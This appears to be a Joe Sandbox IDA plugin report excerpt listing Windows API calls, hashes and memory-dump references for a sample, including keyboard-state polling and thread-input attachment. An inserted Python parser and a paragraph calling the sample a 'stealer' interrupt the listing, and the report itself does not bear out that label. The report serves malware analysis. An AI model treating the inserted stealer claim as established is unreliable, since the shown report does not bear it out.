                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 802431696-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
• Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
• Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
• Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID:
• String ID: HH
• API String ID: 0-2761332787
• Opcode ID: 7d4a86683db9a09c2256a2266118b3ebdc040ee5a517fddb499b320ca0848e6c
• Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
• Opcode Fuzzy Hash: 7d4a86683db9a09c2256a2266118b3ebdc040ee5a517fddb499b320ca0848e6c
• Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
• SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
• _wcslen.LIBCMT ref: 00450944
• _wcscat.LIBCMT ref: 00450955
• SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
• SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend$Window_wcscat_wcslen
• String ID: -----$SysListView32
• API String ID: 4008455318-3975388722
• Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
• Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
• Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
• Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
APIs
• _memset.LIBCMT ref: 00448625
• CreateMenu.USER32 ref: 0044863C
• SetMenu.USER32(?,00000000), ref: 0044864C
• GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
• IsMenu.USER32(?), ref: 004486EB
• CreatePopupMenu.USER32 ref: 004486F5
• InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
• DrawMenuBar.USER32 ref: 00448742
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 176399719-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
• GetDlgCtrlID.USER32(00000000), ref: 00469289
• GetParent.USER32 ref: 004692A4
• SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
• GetDlgCtrlID.USER32(00000000), ref: 004692AE
• GetParent.USER32 ref: 004692C7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2040099840-1403004172
• Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
• Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
• Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
• Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
• GetDlgCtrlID.USER32(00000000), ref: 00469483
• GetParent.USER32 ref: 0046949E
• SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
• GetDlgCtrlID.USER32(00000000), ref: 004694A8
• GetParent.USER32 ref: 004694C1
• SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2040099840-1403004172
• Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
• Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
• Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
• Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
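The per-function API listings above are only useful in bulk if they can be read by a script. The following helper is an added example, not Joe Sandbox code and not part of the sample: it parses listing lines of the form shown here (`Func.MODULE(args), ref: addr`, with `?` for an argument the sandbox could not resolve and an optional `Part of subcall function` prefix) into records, and decodes the `SendMessageW` message IDs that appear in these entries using the standard `winuser.h`/`commctrl.h` constants (0x0111 WM_COMMAND, 0x0186 LB_SETCURSEL, 0x018C LB_SELECTSTRING, 0x1001 LVM_SETBKCOLOR, 0x1026 LVM_SETTEXTBKCOLOR). The line format accepted by the regex is an assumption taken from the entries visible on this page; the sample listing embedded in the code is copied from those entries.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Window-message constants (winuser.h / commctrl.h) for the IDs seen in the
# listings on this page. Extend as needed; unknown IDs are reported as hex.
KNOWN_MESSAGES = {
    0x0111: "WM_COMMAND",
    0x0186: "LB_SETCURSEL",
    0x018C: "LB_SELECTSTRING",
    0x1001: "LVM_SETBKCOLOR",       # LVM_FIRST + 1
    0x1026: "LVM_SETTEXTBKCOLOR",   # LVM_FIRST + 38
}

# Assumed line format (matches the Joe Sandbox entries above):
#   • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
#   • GetParent.USER32 ref: 004692A4
#   • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
_API_RE = re.compile(
    r"^\s*(?:[•*-]\s*)?"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[Optional[int]]      # None where the listing shows '?'
    ref: int                       # call-site address in the dump
    parent: Optional[int] = None   # set for 'Part of subcall function' lines
    message: Optional[str] = None  # decoded Msg for SendMessageW, if known


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one listing line; return None for headers and non-API lines."""
    m = _API_RE.match(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    raw = m.group("args")
    if raw and raw.strip():
        for tok in raw.split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    parent = m.group("parent")
    call = ApiCall(
        func=m.group("func"),
        module=m.group("module"),
        args=args,
        ref=int(m.group("ref"), 16),
        parent=int(parent, 16) if parent else None,
    )
    # SendMessage(hWnd, Msg, wParam, lParam): Msg is the second argument.
    if call.func == "SendMessageW" and len(call.args) >= 2 and call.args[1] is not None:
        call.message = KNOWN_MESSAGES.get(call.args[1], "0x%04X" % call.args[1])
    return call


def parse_api_block(text: str) -> List[ApiCall]:
    """Parse a whole 'APIs' block, skipping lines that are not API calls."""
    calls = []
    for line in text.splitlines():
        call = parse_api_line(line)
        if call is not None:
            calls.append(call)
    return calls


def message_summary(calls: List[ApiCall]) -> List[str]:
    """Sorted, de-duplicated list of decoded window messages sent by the block."""
    return sorted({c.message for c in calls if c.message})


# Sample listing copied from the entries on this page (two function records).
SAMPLE_LISTING = """APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
• GetDlgCtrlID.USER32(00000000), ref: 00469289
• GetParent.USER32 ref: 004692A4
• SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
• GetDlgCtrlID.USER32(00000000), ref: 004692AE
• GetParent.USER32 ref: 004692C7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
Strings
• SendMessageW.USER32(75A923D0,00001001,00000000,00000000), ref: 00448E73
• SendMessageW.USER32(75A923D0,00001026,00000000,00000000), ref: 00448E7E
"""

if __name__ == "__main__":
    parsed = parse_api_block(SAMPLE_LISTING)
    for c in parsed:
        print(f"{c.ref:08X} {c.func}.{c.module} {c.args} {c.message or ''}")
    print("messages:", message_summary(parsed))
```

The decoded names (LB_SELECTSTRING, WM_COMMAND against the parent via GetParent, list-view colour messages next to CreateSolidBrush/DeleteObject) match the report's own API ID and String ID labels ("MessageSend$CtrlParent", "ComboBox$ListBox"), which is the check worth making before treating any of these GUI helpers as part of the stealer logic rather than the wrapper's dialog code.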
APIs
  • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
• SendMessageW.USER32(75A923D0,00001001,00000000,00000000), ref: 00448E73
• SendMessageW.USER32(75A923D0,00001026,00000000,00000000), ref: 00448E7E
  • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3771399671-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3413494760-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
• Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __wcsicoll
• String ID: 0%d$DOWN$OFF
• API String ID: 3832890014-468733193
• Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
• Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
• Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
• Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045E959
• VariantCopy.OLEAUT32(00000000), ref: 0045E963
• VariantClear.OLEAUT32 ref: 0045E970
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
• __swprintf.LIBCMT ref: 0045EB1F
• VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
• VariantInit.OLEAUT32(00000000), ref: 0045EBE7
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 43541914-1568723262
• Opcode ID: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
• Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
• Opcode Fuzzy Hash: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
• Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
APIs
• InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
• Sleep.KERNEL32(0000000A), ref: 0042FE6E
• InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: DecrementInterlocked$Sleep
• String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
• API String ID: 2250217261-3412429629
• Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
• Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
• Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
• Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
